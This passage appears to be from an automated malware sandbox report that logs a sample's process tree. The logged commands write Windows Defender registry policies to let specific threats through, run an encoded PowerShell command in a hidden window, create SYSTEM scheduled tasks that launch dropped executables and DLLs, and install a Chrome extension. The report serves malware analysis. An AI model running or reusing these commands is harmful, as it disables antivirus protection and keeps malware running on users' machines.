ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
    [3] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 16:04:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\oaNMFMP.exe\" GH /IXdZdidzP 385118 /S" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "XyyyteIMwZeutaZuw"
[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
  [2] C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
[1] C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam
[1] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2676 -ip 2676
[1] C:\ProgramData\Google\Chrome\updater.exe | C:\ProgramData\Google\Chrome\updater.exe
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
  [2] C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  [2] C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  [2] C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    [3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  [2] C:\Windows\system32\conhost.exe | C:\Windows\system32\conhost.exe
  [2] C:\Windows\explorer.exe | explorer.exe
[1] C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\DlRIpsJ.exe | C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\DlRIpsJ.exe GH /smlMdidqG 385118 /S
    - Checks computer location settings
    - Executes dropped EXE
    - Drops Chrome extension
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
  [2] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      [4] C:\Windows\SysWOW64\cmd.exe | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell start-process -WindowStyle Hidden gpupdate.exe /force
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          [6] C:\Windows\SysWOW64\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  [2] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
    [3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      [4] C:\Windows\SysWOW64\cmd.exe | /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          [6] C:\Windows\SysWOW64\Wbem\WMIC.exe | "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\AAnZBg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)
    [3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\xFHDGyR.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "FPieTEPPuEmJrhC"
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\NAqzQYE.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\AaWEgxn.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\UHNAHEo.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
    [3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\VpmQlsw.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 03:38:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\ARwVOAfk\ycQhKOQ.dll\",#1 /eaPdidbMnh 385118" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)
    [3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
[1] C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\oaNMFMP.exe | C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\oaNMFMP.exe GH /IXdZdidzP 385118 /S
    - Blocklisted process makes network request
    - Checks computer location settings
    - Executes dropped EXE
    - Drops Chrome extension
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
  [2] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      [4] C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        [5] \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      [4] C:\Windows\SysWOW64\cmd.exe | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell start-process -WindowStyle Hidden gpupdate.exe /force
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          [6] C:\Windows\SysWOW64\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
    [3] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
    [3] C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      [4] C:\Windows\SysWOW64\cmd.exe | /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          [6] C:\Windows\SysWOW64\Wbem\WMIC.exe | "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\dGukws.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\HaouQex.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "FPieTEPPuEmJrhC"
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\tPTBJIh.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\fFKOMMf.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\DogRzDq.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\xwTsNCD.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
[1] C:\Windows\system32\rundll32.EXE | C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\ARwVOAfk\ycQhKOQ.dll",#1 /eaPdidbMnh 385118
  [2] C:\Windows\SysWOW64\rundll32.exe | C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\ARwVOAfk\ycQhKOQ.dll",#1 /eaPdidbMnh 385118
